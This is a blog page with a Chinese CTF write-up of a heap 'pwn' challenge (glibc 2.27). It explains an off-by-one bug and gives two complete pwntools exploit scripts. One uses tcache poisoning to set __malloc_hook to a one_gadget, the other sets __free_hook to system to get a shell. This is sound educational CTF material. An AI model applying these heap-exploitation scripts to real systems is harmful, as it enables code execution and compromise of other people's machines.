<!DOCTYPE html>
<html lang="en">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  <link rel="icon" href="/images/site_logo.ico">
  <title>2021_BUUCTF&DASCTF_pwn | Darry's Blog</title>
  <meta name="author" content="Darry想学二进制" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="heap, pwn, writeup, 新手向" />
  
  <meta name="description" content="PWN：pwnpwn.zip 运行环境为ubuntu18.04，libc-2.27 题目分析不用想保护全开，经典菜单题      菜单有malloc、free、edit、show功能，有一个offbyone漏洞，可以尝试三明治攻击构造两个指向同一块chunk的指针，还有一种方法就是利用overlapping来攻击 方法一思路 先将大小为0x90的tcachebins填满 然后构造0x91（free">
<meta property="og:type" content="article">
<meta property="og:title" content="2021_BUUCTF&amp;DASCTF_pwn">
<meta property="og:url" content="http://example.com/2021/05/30/2021-5-30/index.html">
<meta property="og:site_name" content="Darry&#39;s Blog">
<meta property="og:description" content="PWN：pwnpwn.zip 运行环境为ubuntu18.04，libc-2.27 题目分析不用想保护全开，经典菜单题      菜单有malloc、free、edit、show功能，有一个offbyone漏洞，可以尝试三明治攻击构造两个指向同一块chunk的指针，还有一种方法就是利用overlapping来攻击 方法一思路 先将大小为0x90的tcachebins填满 然后构造0x91（free">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/site_logo.ico">
<meta property="article:published_time" content="2021-05-30T14:35:03.000Z">
<meta property="article:modified_time" content="2021-05-31T12:24:06.541Z">
<meta property="article:author" content="Darry想学二进制">
<meta property="article:tag" content="heap">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="新手向">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/site_logo.ico">
<meta name="twitter:site" content="@null">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" type="text/css" media="all">
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" type="text/css" media="all">
  
  
  <link rel="stylesheet" id="fontawe-css" href="https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="nprogress-css" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" type="text/css" media="all">
  
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.css">
  
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-dark.min.css" type="text/css" media="all">
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="https://cdn.jsdelivr.net/npm/qrcode_js@1.0.0/qrcode.min.js"></script>
  
<meta name="generator" content="Hexo 5.4.0"></head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                        <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                    
                                
                                    
                                        <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                    
                                
                                    
                                        <li><a href="/friends/"><i class="fa fa-paw"></i>好伙伴</a></li>
                                    
                                
                                    
                                        <li>
                                            <a><i class="fa fa-link"></i>链接</a>
                                            <ul class="sub-menu">
                                                
                                                    
                                                
                                                    
                                                        <li><a target="_blank" rel="noopener" href="http://www.darry-long.top">作者博客</a></li>
                                                    
                                                
                                                    
                                                        <li><a target="_blank" rel="noopener" href="https://github.com/Darry-lang1/Darry-lang1.github.io/tree/master">项目链接</a></li>
                                                    
                                                
                                            </ul>
                                        </li>
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">Darry&#39;s Blog</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>Darry&#39;s Blog</h2> <br />
                        <span></span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        <section class="col-md-8">
    <article>
        <div class="kratos-hentry kratos-post-inner clearfix">
            <header class="kratos-entry-header">
                
                    <h1 class="kratos-entry-title text-center">2021_BUUCTF&DASCTF_pwn</h1>
                
                
                <ul class="kratos-post-meta text-center">
                    <li><i class="fa fa-calendar"></i> 2021-05-30</li>
                    <li><i class="fa fa-user"></i> 作者 Darry想学二进制</li>
                    <li>
                        <i class="fa fa-edit"></i> 
                        
                        
                            ~5.00K
                        
                        字
                    </li>
                    
                </ul>
            </header>
            <div class="kratos-post-content">
                <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                    本文最后编辑于 <time datetime="1622463846541"></time> 前，其中的内容可能需要更新。
                </div>
                
                    <div class="kratos-post-inner-toc">
                        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PWN%EF%BC%9Apwn"><span class="toc-number">1.</span> <span class="toc-text">PWN：pwn</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">题目分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-number">3.</span> <span class="toc-text">方法一</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">3.1.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9D%91%E7%82%B9"><span class="toc-number">3.2.</span> <span class="toc-text">坑点</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">3.3.</span> <span class="toc-text">exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-number">4.</span> <span class="toc-text">方法二</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF-1"><span class="toc-number">4.1.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp-1"><span class="toc-number">4.2.</span> <span class="toc-text">exp</span></a></li></ol></li></ol>
                    </div>
                
                <hr />
                <h1 id="PWN：pwn"><a href="#PWN：pwn" class="headerlink" title="PWN：pwn"></a>PWN：pwn</h1><p><a href="/download/2021_5_30_pwn.zip">pwn.zip</a></p>
<p>运行环境为ubuntu18.04，libc-2.27</p>
<h1 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h1><p>不用想保护全开，经典菜单题</p>
<p><img src="/2021/05/30/2021-5-30/Untitled.png" alt="2021-5-30/Untitled.png"></p>
<p><img src="/2021/05/30/2021-5-30/Untitled%201.png" alt="2021-5-30/Untitled%201.png"></p>
<p><img src="/2021/05/30/2021-5-30/Untitled%202.png" alt="2021-5-30/Untitled%202.png"></p>
<p><img src="/2021/05/30/2021-5-30/Untitled%203.png" alt="2021-5-30/Untitled%203.png"></p>
<p><img src="/2021/05/30/2021-5-30/Untitled%204.png" alt="2021-5-30/Untitled%204.png"></p>
<p>菜单有malloc、free、edit、show功能，有一个offbyone漏洞，可以尝试三明治攻击构造两个指向同一块chunk的指针，还有一种方法就是利用overlapping来攻击</p>
<h1 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h1><h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><ul>
<li>先将大小为0x90的tcachebins填满</li>
<li>然后构造0x91（free）—0x90（used）—0x91（used）三明治布局</li>
<li>利用offbyone修改第三个堆块的presize和pre_inuse位，利用unlink得到一个0x1B0大小的堆块包含中间的0x90</li>
<li>将第一个堆块申请出来，通过第二个堆块（used）就可以泄露地址</li>
<li>再申请一个堆块就得到两个指向同一块chunk的指针即第二个堆块</li>
<li>通过攻击tcachebins来写malloc_hook为one_gadget</li>
<li>申请堆块获取shell</li>
</ul>
<h2 id="坑点"><a href="#坑点" class="headerlink" title="坑点"></a>坑点</h2><ul>
<li>offbyone漏洞一开始没发现，后续仔细分析了一下发现很简单，一开始没静下心来分析</li>
<li>不清楚题目的libc版本，题目只给了libc.so</li>
<li>注意最后一个堆块要额外申请一个小堆块，防止与top chunk合并</li>
</ul>
<p>题外话：比赛当天有事导致题目没怎么看，准备赛后复现，然后第一道堆题环境是2.23版本的，不太熟悉就没怎么看了，主要是第二道堆题（现在写的），offbyone漏洞一开始没发现，看大佬的博客发现漏洞后（就是当申请的堆块的size的倒数第四位为一，就差不多行了刚好8满足需求）就感觉可以做出了，自己尝试了一下，确实发现没什么难度，这类题目做过类似的所以挺简单的，文章末尾会附上一些大佬的wp和一些例题</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">binary=<span class="string">&#x27;./pwn&#x27;</span></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line">one_gadget = [<span class="number">0x4f3d5</span>,<span class="number">0x4f3d5</span>,<span class="number">0x10a41c</span>]</span><br><span class="line">arena=<span class="number">0x3ebc40</span></span><br><span class="line"><span class="keyword">if</span> local == <span class="number">1</span>:</span><br><span class="line">    io=process(binary)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io=remote()</span><br><span class="line">e=ELF(binary)</span><br><span class="line">libc = e.libc</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">idx, size, data=<span class="string">&quot;a&quot;</span></span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;please choice your card:&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Infuse power:\n&quot;</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    io.sendafter(<span class="string">&quot;quickly!&quot;</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx, data</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;2&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;please choice your card\n&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.sendafter(<span class="string">&quot;start your bomb show\n&quot;</span>, data)</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">idx</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;3&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Which card:&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;4&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;index:&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.recvuntil(<span class="string">&quot;dedededededede:&quot;</span>)</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">	alloc(i,<span class="number">0x80</span>)</span><br><span class="line">alloc(<span class="number">7</span>,<span class="number">0x80</span>) <span class="comment">#idx:7</span></span><br><span class="line">alloc(<span class="number">8</span>,<span class="number">0x88</span>) <span class="comment">#idx:8</span></span><br><span class="line">alloc(<span class="number">9</span>,<span class="number">0x80</span>)	<span class="comment">#idx:9</span></span><br><span class="line">alloc(<span class="number">10</span>,<span class="number">0x20</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">	free(i)</span><br><span class="line">edit(<span class="number">8</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x80</span>+p64(<span class="number">0x120</span>)+<span class="string">b&#x27;\x90&#x27;</span>)</span><br><span class="line">free(<span class="number">9</span>)	</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">	alloc(i,<span class="number">0x80</span>)</span><br><span class="line">alloc(<span class="number">7</span>,<span class="number">0x80</span>) <span class="comment">#idx:7</span></span><br><span class="line">show(<span class="number">8</span>)</span><br><span class="line">libc_base = u64(io.recvuntil(<span class="string">b&quot;\x7f&quot;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-arena-<span class="number">0x60</span></span><br><span class="line">one_gadget = one_gadget[<span class="number">2</span>]+libc_base</span><br><span class="line">malloc_hook = libc.sym[<span class="string">&quot;__malloc_hook&quot;</span>] + libc_base</span><br><span class="line">io.info(<span class="string">&quot;libc_base==&gt;%#x&quot;</span>,libc_base)</span><br><span class="line">alloc(<span class="number">9</span>,<span class="number">0x80</span>) <span class="comment">#idx:9 = idx:8</span></span><br><span class="line">alloc(<span class="number">11</span>,<span class="number">0x80</span>) <span class="comment">#idx:11</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">7</span>)</span><br><span class="line">free(<span class="number">8</span>)</span><br><span class="line">edit(<span class="number">9</span>,p64(malloc_hook))</span><br><span class="line">gdb.attach(io,<span class="string">&quot;b *$rebase(0xF57)&quot;</span>)</span><br><span class="line">alloc(<span class="number">7</span>,<span class="number">0x80</span>)<span class="comment">#idx:7 =idx:8</span></span><br><span class="line">alloc(<span class="number">8</span>,<span class="number">0x80</span>)</span><br><span class="line">edit(<span class="number">8</span>,p64(one_gadget))</span><br><span class="line">io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">&quot;please choice your card:&quot;</span>, <span class="built_in">str</span>(<span class="number">12</span>))</span><br><span class="line">io.sendlineafter(<span class="string">&quot;Infuse power:\n&quot;</span>, <span class="string">b&#x27;16&#x27;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/2021/05/30/2021-5-30/Untitled%205.png" alt="2021-5-30/Untitled%205.png"></p>
<h1 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h1><h2 id="思路-1"><a href="#思路-1" class="headerlink" title="思路"></a>思路</h2><ul>
<li>构造三个堆块0x21（used）-0x91（used）-0x21（used）</li>
<li>然后利用offbyone修改第二个堆块的大小，使得第二个堆块的大小刚好覆盖第三个堆块（也就是将第二个堆块）</li>
<li>释放第二块堆块，再申请0x91大小的堆块，这样就可以通过第三个堆块泄露地址</li>
<li>再申请一个0x21堆块就得到两个指向同一块chunk的指针即第三个堆块</li>
<li>写free_hook为system地址，释放带有/bin/sh的块获取shell</li>
</ul>
<h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">binary=<span class="string">&#x27;./pwn&#x27;</span></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line">one_gadget = [<span class="number">0x4f3d5</span>,<span class="number">0x4f3d5</span>,<span class="number">0x10a41c</span>]</span><br><span class="line">arena=<span class="number">0x3ebc40</span></span><br><span class="line"><span class="keyword">if</span> local == <span class="number">1</span>:</span><br><span class="line">    io=process(binary)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io=remote()</span><br><span class="line">e=ELF(binary)</span><br><span class="line">libc = e.libc</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">idx, size, data=<span class="string">&quot;a&quot;</span></span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;please choice your card:&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Infuse power:\n&quot;</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    io.sendafter(<span class="string">&quot;quickly!&quot;</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx, data</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;2&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;please choice your card\n&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.sendafter(<span class="string">&quot;start your bomb show\n&quot;</span>, data)</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">idx</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;3&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Which card:&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line">    io.sendlineafter(<span class="string">&quot;choice:&quot;</span>, <span class="string">&quot;4&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;index:&quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    io.recvuntil(<span class="string">&quot;dedededededede:&quot;</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0</span>,<span class="number">0x18</span>) <span class="comment">#idx:0</span></span><br><span class="line">alloc(<span class="number">1</span>,<span class="number">0x80</span>) <span class="comment">#idx:1</span></span><br><span class="line">alloc(<span class="number">2</span>,<span class="number">0x10</span>) <span class="comment">#idx:2</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>,<span class="number">10</span>):</span><br><span class="line">	alloc(i,<span class="number">0xa0</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">b&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="number">0x18</span>,<span class="string">b&#x27;\00&#x27;</span>)+<span class="string">b&#x27;\xb1&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>,<span class="number">10</span>):</span><br><span class="line">	free(i) <span class="comment">#将tcachebins填满，使堆块释放到unsortedbins里</span></span><br><span class="line">free(<span class="number">1</span>) <span class="comment">#idx:1 = idx:1+idx:2 size:0xb1</span></span><br><span class="line">alloc(<span class="number">1</span>,<span class="number">0x80</span>) <span class="comment">#idx:1</span></span><br><span class="line">show(<span class="number">2</span>) <span class="comment">#泄露地址</span></span><br><span class="line">libc_base = u64(io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-arena-<span class="number">0x60</span></span><br><span class="line">io.info(<span class="string">&quot;libc_base==&gt;%#x&quot;</span>,libc_base)</span><br><span class="line">alloc(<span class="number">3</span>,<span class="number">0x10</span>) <span class="comment">#idx:3 = idx:2</span></span><br><span class="line">free_hook = libc_base+libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">system = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">3</span>,p64(free_hook))</span><br><span class="line">alloc(<span class="number">4</span>,<span class="number">0x10</span>)<span class="comment">#idx:4</span></span><br><span class="line">alloc(<span class="number">5</span>,<span class="number">0x10</span>)<span class="comment">#idx:5 free_hook</span></span><br><span class="line">edit(<span class="number">5</span>,p64(system))</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>参考博文：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/LynneHuan/p/14826770.html">https://www.cnblogs.com/LynneHuan/p/14826770.html</a></p>
<p><a target="_blank" rel="noopener" href="https://m.sohu.com/a/342787157_120136504">https://m.sohu.com/a/342787157_120136504</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/f1ec36d0b41c">https://www.jianshu.com/p/f1ec36d0b41c</a></p>
<p>推荐例题：</p>
<p><a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#sctf_2019_easy_heap">https://buuoj.cn/challenges#sctf_2019_easy_heap</a></p>

            </div>
            
                <div class="kratos-copyright text-center clearfix">
                    <h5>本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
                </div>
            
            <footer class="kratos-entry-footer clearfix">
                
                    <div class="post-like-donate text-center clearfix" id="post-like-donate">
                    
                    
                        <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                        <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "http://example.com/2021/05/30/2021-5-30/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "http://example.com/2021/05/30/2021-5-30/";
            const title         = "「2021_BUUCTF&DASCTF_pwn」";
            const excerpt       = `PWN：pwnpwn.zip
运行环境为ubuntu18.04，libc-2.27
题目分析不用想保护全开，经典菜单题





菜单有malloc、free、edit、show功能，有一个offbyone漏洞，可以尝试三明治攻击构造...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                    
                    </div>
                
                <div class="footer-tag clearfix">
                    <div class="pull-left">
                    <i class="fa fa-tags"></i>
                        <a class="tag-none-link" href="/tags/heap/" rel="tag">heap</a>, <a class="tag-none-link" href="/tags/pwn/" rel="tag">pwn</a>, <a class="tag-none-link" href="/tags/writeup/" rel="tag">writeup</a>, <a class="tag-none-link" href="/tags/%E6%96%B0%E6%89%8B%E5%90%91/" rel="tag">新手向</a>
                    </div>
                    <div class="pull-date">
                    <span>最后编辑：2021-05-31</span>
                    </div>
                </div>
            </footer>
        </div>
        
            <nav class="navigation post-navigation clearfix" role="navigation">
                
                <div class="nav-previous clearfix">
                    <a title=" 2021_360CTF_pwn" href="/2021/05/27/2021-5-27/">&lt; 上一篇</a>
                </div>
                
                
                <div class="nav-next clearfix">
                    <a title=" 2021_蓝帽杯半决赛pwn" href="/2021/06/06/2021-6-6/">下一篇 &gt;</a>
                </div>
                
            </nav>
        
        
    </article>
</section>

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/avatar.webp" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center"></p>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                    <aside id="krw-toc" class="widget widget-kratos-toc clearfix">
    <div class="photo-background"></div>
    <h4 class="widget-title no-after">
        <i class="fa fa-compass"></i>
        文章目录
